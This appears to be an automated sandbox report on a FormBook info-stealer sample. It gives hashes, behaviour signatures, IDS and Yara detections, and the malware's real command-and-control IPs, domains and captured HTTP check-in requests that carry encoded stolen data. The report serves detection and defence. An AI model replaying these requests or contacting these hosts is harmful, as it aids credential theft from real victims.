
Windows Analysis Report
BDlwy8b7Km.exe

Overview

General Information

Sample name: BDlwy8b7Km.exe (renamed because the original name is a hash value)
Original sample name: 9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3.exe
Analysis ID: 1588891
MD5: 95b9d05f97fba1718d8c85967ebffc4c
SHA1: 8752f152236cf941e59aff72b182c5afc205927e
SHA256: 9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BDlwy8b7Km.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\BDlwy8b7Km.exe" MD5: 95B9D05F97FBA1718D8C85967EBFFC4C)
    • svchost.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\BDlwy8b7Km.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FKUPIibLrFYhJ.exe (PID: 4484 cmdline: "C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • relog.exe (PID: 7676 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)
          • FKUPIibLrFYhJ.exe (PID: 5552 cmdline: "C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7808 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(2 further entries not shown)

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ParentImage: C:\Users\user\Desktop\BDlwy8b7Km.exe, ParentProcessId: 7300, ParentProcessName: BDlwy8b7Km.exe, ProcessCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ProcessId: 7360, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ParentImage: C:\Users\user\Desktop\BDlwy8b7Km.exe, ParentProcessId: 7300, ParentProcessName: BDlwy8b7Km.exe, ProcessCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ProcessId: 7360, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:54:42.343238+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50024 | 46.38.243.234 | 80 | TCP
2025-01-11T06:55:28.274099+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:52.580528+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49842 | 47.83.1.90 | 80 | TCP
2025-01-11T06:56:06.120981+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49928 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:19.683968+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50016 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:32.949886+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 209.74.79.41 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:54:42.343238+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 46.38.243.234 | 80 | TCP
2025-01-11T06:55:28.274099+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:52.580528+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49842 | 47.83.1.90 | 80 | TCP
2025-01-11T06:56:06.120981+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49928 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:19.683968+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:32.949886+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 209.74.79.41 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:55:44.858916+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:47.405795+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49805 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:49.952696+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:58.437669+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49882 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:00.988683+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49899 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:03.565517+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49915 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:12.053749+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49968 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:14.744445+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49988 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:17.764973+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50005 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:25.298946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:27.861751+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:30.418867+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:39.530934+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 46.38.243.234 | 80 | TCP
2025-01-11T06:56:42.077713+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 46.38.243.234 | 80 | TCP
2025-01-11T06:56:44.624617+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 46.38.243.234 | 80 | TCP


AV Detection

Source: BDlwy8b7Km.exe | Avira: detected
Source: BDlwy8b7Km.exe | ReversingLabs: Detection: 70%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: BDlwy8b7Km.exe | Joe Sandbox ML: detected
Source: BDlwy8b7Km.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: relog.pdbGCTL | source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: relog.pdb | source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559491409.000000000068E000.00000002.00000001.01000000.00000005.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3558984084.000000000068E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_005FDBBE
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_006068EE FindFirstFileW,FindClose | 0_2_006068EE
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_0060698F
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_005FD076
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_005FD3A9
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00609642
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0060979D
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00609B2B
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00605C97
Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EEC330 FindFirstFileW,FindNextFileW,FindClose | 6_2_02EEC330
Source: C:\Windows\SysWOW64\relog.exe | Code function: 4x nop then xor eax, eax | 6_2_02ED9E90
Source: C:\Windows\SysWOW64\relog.exe | Code function: 4x nop then pop edi | 6_2_02EE5659
Source: C:\Windows\SysWOW64\relog.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_035004E8

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 185.151.30.223:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 185.151.30.223:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49968 -> 176.57.65.76:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49842 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49842 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49988 -> 176.57.65.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 176.57.65.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49928 -> 185.151.30.223:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49928 -> 185.151.30.223:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 185.151.30.223:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50016 -> 176.57.65.76:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50016 -> 176.57.65.76:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 46.38.243.234:80
Source: DNS query: www.thinkone.xyz
Source: Joe Sandbox View | IP Address: 176.57.65.76
Source: Joe Sandbox View | IP Address: 47.83.1.90
Source: Joe Sandbox View | ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0060CE44 InternetReadFile,SetEvent,GetLastError,SetEvent | 0_2_0060CE44
Source: global traffic | HTTP traffic detected:
  GET /ou8k/?TXVlY=nv6XU20pgPTDN0&94=sHhXhPPev91RFxpjPhHA/72AjtyYVyN8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmOm9tiQhux0BP2yYLzMg1QsJkzQ4A7X5eN3dM= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.aoivej.info
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | HTTP traffic detected:
  GET /wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.givvjn.info
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | HTTP traffic detected:
  GET /xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.gern.dev
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | HTTP traffic detected:
  GET /fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.newbh.pro
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | HTTP traffic detected:
  GET /b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.thinkone.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | HTTP traffic detected:
  GET /ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Host: www.mraber.dev
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic | DNS traffic detected: DNS query: www.aoivej.info
Source: global traffic | DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic | DNS traffic detected: DNS query: www.gern.dev
Source: global traffic | DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic | DNS traffic detected: DNS query: www.thinkone.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mraber.dev
Source: unknown | HTTP traffic detected:
  POST /wl3x/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Host: www.givvjn.info
  Origin: http://www.givvjn.info
  Referer: http://www.givvjn.info/wl3x/
  Content-Length: 199
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: no-cache
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
  Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 4e 36 64 42 41 73 7a 34 31 61 6b 39 6f 75 6e 4d 77 42 36 4b 57 34 31 31 30 35 78 46 68 50 62 6e 41 3d 3d
  Data Ascii: 94=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNN6dBAsz41ak9ounMwB6KW41105xFhPbnA==
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Sat, 11 Jan 2025 05:56:25 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
